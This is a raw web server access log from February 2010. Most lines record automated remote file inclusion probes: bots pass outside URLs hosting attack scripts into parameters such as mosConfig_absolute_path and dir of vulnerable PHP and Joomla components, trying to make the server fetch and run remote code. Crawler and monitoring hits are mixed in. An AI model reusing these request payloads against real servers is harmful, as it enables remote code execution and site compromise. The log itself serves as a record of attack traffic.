195.186.64.181 - - [15/Feb/2010:01:09:37 -0500] "GET /logs/access_log.Q110020800//salz_dierectnnormal_gallery/setup.php?dir=http://maxnagl.de/components//com_expose/nl-NL/id1.txt?? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:01:09:37 -0500] "GET //salz_dierectnnormal_gallery/setup.php?dir=http://maxnagl.de/components//com_expose/nl-NL/id1.txt?? HTTP/1.0" 404 236 "-" "Mozilla/5.0"
94.23.218.62 - - [15/Feb/2010:01:09:48 -0500] "GET /logs/error_log.Q110020600//errors.php?error=http://xenoide.co.uk//images/icons/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
94.23.218.62 - - [15/Feb/2010:01:09:48 -0500] "GET //errors.php?error=http://xenoide.co.uk//images/icons/id.txt??? HTTP/1.1" 404 209 "-" "libwww-perl/5.831"
94.23.218.62 - - [15/Feb/2010:01:09:48 -0500] "GET /logs//errors.php?error=http://xenoide.co.uk//images/icons/id.txt??? HTTP/1.1" 404 214 "-" "libwww-perl/5.831"
95.108.128.242 - - [15/Feb/2010:01:09:34 -0500] "GET /logs/error_log.Q110020700 HTTP/1.1" 200 3234860 "-" "Yandex/1.01.001 (compatible; Win16; I)"
209.126.254.164 - - [15/Feb/2010:01:09:59 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:01:09:59 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:01:09:59 -0500] "GET /logs/access_log.Q109102900//skin/ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:01:10:00 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
85.112.126.5 - - [15/Feb/2010:01:10:00 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
66.249.68.151 - - [15/Feb/2010:01:10:08 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01521D5E32626800003D047+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.150.99.144 - - [15/Feb/2010:01:10:13 -0500] "GET /logs//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:13 -0500] "GET /logs/access_log.Q110011800//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:13 -0500] "GET /logs//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:13 -0500] "GET /logs/access_log.Q110011800//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:13 -0500] "GET //joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:13 -0500] "GET //joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:14 -0500] "GET /logs//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:14 -0500] "GET /logs/access_log.Q110011800%20%20//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:14 -0500] "GET /logs/access_log.Q109101600%20%20//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:14 -0500] "GET //joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
94.23.218.62 - - [15/Feb/2010:01:10:15 -0500] "GET /logs/error_log.Q109070900//errors.php?error=http://xenoide.co.uk//images/icons/id.txt??? HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
58.150.99.144 - - [15/Feb/2010:01:10:20 -0500] "GET /logs/access_log.Q109101600//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:20 -0500] "GET /logs/access_log.Q109101600//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:20 -0500] "GET //joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:20 -0500] "GET /logs//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:20 -0500] "GET /logs/access_log.Q110011800%20%20//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:10:20 -0500] "GET /logs/access_log.Q109101600%20%20//joomla/index.php?option=com_restaurante&task=http://musicadelibreria.net/footer?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:10:38 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:10:39 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:10:40 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:10:40 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:10:55 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:10:55 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:10:56 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:10:56 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
195.186.64.181 - - [15/Feb/2010:01:11:02 -0500] "GET /logs/access_log.Q109121100//salz_dierectnnormal_gallery/setup.php?dir=http://maxnagl.de/components//com_expose/nl-NL/id1.txt?? HTTP/1.0" 404 263 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:11:07 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:11:07 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:11:12 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:11:12 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:12:09 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/f1.asp? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:12:09 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/f1.asp? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:12:09 -0500] "GET /logs/access_log.Q109101600%20%20/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:12:13 -0500] "GET /logs/access_log.Q109101600%20%20/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:01:12:17 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
62.193.225.60 - - [15/Feb/2010:01:12:56 -0500] "GET /logs/access_log.Q109101600/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:12:58 -0500] "GET /logs/access_log.Q109101600/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:13:07 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:13:07 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:13:08 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:13:08 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:14:02 -0500] "GET /logs/access_log.Q109101600/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
62.193.225.60 - - [15/Feb/2010:01:14:03 -0500] "GET /logs/access_log.Q109101600/includes/ktedit/toolbar.php?dirDepth=http://shtuchki.org.ua/images/icons/open.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:30 -0500] "GET /playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:30 -0500] "GET /logs/access_log.Q109071100%20%20/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:30 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:34 -0500] "GET /playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:34 -0500] "GET /logs/access_log.Q109071100%20%20/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:34 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:40 -0500] "GET /playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:40 -0500] "GET /logs/access_log.Q109071100/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:40 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:43 -0500] "GET /playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:44 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
69.13.69.245 - - [15/Feb/2010:01:14:44 -0500] "GET /logs/access_log.Q109071100/playing.php/common/db.php?commonpath=http://www.alsatavm.com//administrator/components/com_virtuemart/open.jpg??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:15:10 -0500] "GET /logs/error_log.Q109110100%20%20//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:15:10 -0500] "GET /logs//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:15:10 -0500] "GET //appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.221.130.15 - - [15/Feb/2010:01:15:10 -0500] "GET /logs/access_log.Q109110100%20%20//appserv/main.php?appserv_root=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
201.24.87.113 - - [15/Feb/2010:01:15:18 -0500] "GET //board.php?code=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.24.87.113 - - [15/Feb/2010:01:15:18 -0500] "GET /logs//board.php?code=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:01:15:52 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:01:15:52 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:16:18 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/f1.asp? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:16:18 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/f1.asp? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:16:43 -0500] "GET ///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:16:43 -0500] "GET /logs/access_log.Q110020200%20%20///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:16:44 -0500] "GET /logs///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:16:52 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/p1.asp? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:16:52 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/p1.asp? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:16:52 -0500] "GET /logs/error_log.Q110012900%20%20//skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/p1.asp? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
87.106.250.198 - - [15/Feb/2010:01:16:53 -0500] "GET /logs/access_log.Q110020700//bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:01:17:00 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:01:17:00 -0500] "GET /logs/access_log.Q109092700//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
220.73.144.196 - - [15/Feb/2010:01:17:00 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.126.254.164 - - [15/Feb/2010:01:17:12 -0500] "GET /logs/access_log.Q110012900//skin/ggambo7002_board/write.php?dir=http://www.qqe.ru/forum/echo/idsatu.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:17:12 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:17:12 -0500] "GET /logs/access_log.Q109081500%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:17:12 -0500] "GET /logs/access_log.Q109071600%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:17:12 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:17:15 -0500] "GET /logs/access_log.Q109081500%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:17:15 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:17:15 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 38407 "-" "Mozilla/5.0"
62.140.23.24 - - [15/Feb/2010:01:17:15 -0500] "GET /logs/access_log.Q109071600%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:17:17 -0500] "GET //skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/f1.asp? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:17:17 -0500] "GET /logs//skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/f1.asp? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.141.91.138 - - [15/Feb/2010:01:17:17 -0500] "GET /logs/error_log.Q110012900%20%20//skin/ggambo7002_board/write.php?dir=http://bbs.chatlist.net/gnuboard4/run/f1.asp? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:17:21 -0500] "GET /logs/access_log.Q110020200%20%20///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:17:21 -0500] "GET /logs///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:17:21 -0500] "GET ///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
87.106.250.198 - - [15/Feb/2010:01:17:36 -0500] "GET /logs/access_log.Q110012600//bbs//delete_comment.php?board_skin_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:17:44 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:01:17:46 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:17:46 -0500] "GET /logs/access_log.Q109121100//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 292 "-" "Mozilla/5.0"
189.6.218.57 - - [15/Feb/2010:01:17:46 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:01:17:46 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.93.147.154 - - [15/Feb/2010:01:17:46 -0500] "GET /logs/access_log.Q110012300%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
67.195.115.186 - - [15/Feb/2010:01:17:19 -0500] "GET /logs/error_log.Q109101700 HTTP/1.0" 200 3728911 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.115.186 - - [15/Feb/2010:01:17:55 -0500] "GET /logs/error_log.Q109101700 HTTP/1.0" 200 3728911 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
200.93.147.154 - - [15/Feb/2010:01:18:50 -0500] "GET /logs/access_log.Q109100300%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
208.70.72.86 - - [15/Feb/2010:01:19:51 -0500] "GET /logs//common/db!php?commonpath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
208.70.72.86 - - [15/Feb/2010:01:19:51 -0500] "GET /logs/error_log.Q110020400//common/db!php?commonpath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
208.70.72.86 - - [15/Feb/2010:01:19:51 -0500] "GET //common/db!php?commonpath=http://www.nsi.or.kr/ws/files/summary/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:19:58 -0500] "GET /logs/access_log.Q110020700%20%20///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Feb/2010:01:20:18 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.125.66.63 - - [15/Feb/2010:01:20:26 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
58.150.99.144 - - [15/Feb/2010:01:20:29 -0500] "GET /logs/access_log.Q110020700%20%20///bbs/delete_all?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
220.181.7.120 - - [15/Feb/2010:01:20:40 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
95.108.128.242 - - [15/Feb/2010:01:20:46 -0500] "GET /images/_notes/nav04_about_over.jpg.mno HTTP/1.1" 200 258 "-" "Yandex/1.01.001 (compatible; Win16; I)"
220.73.144.196 - - [15/Feb/2010:01:21:09 -0500] "GET /logs/access_log.Q109092700%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:01:21:51 -0500] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:01:21:51 -0500] "GET //components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
218.234.20.117 - - [15/Feb/2010:01:21:51 -0500] "GET /logs/access_log.Q109092700//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
210.127.209.105 - - [15/Feb/2010:01:22:36 -0500] "GET /logs/error_log.Q109090200%20%20/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 301 "-" "Mozilla/5.0"
210.127.209.105 - - [15/Feb/2010:01:22:36 -0500] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
210.127.209.105 - - [15/Feb/2010:01:22:37 -0500] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig.absolute_path=http://gnu.kimsaem.net/bbs/img/poll_ico.gif?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:22:51 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
58.150.99.144 - - [15/Feb/2010:01:22:51 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
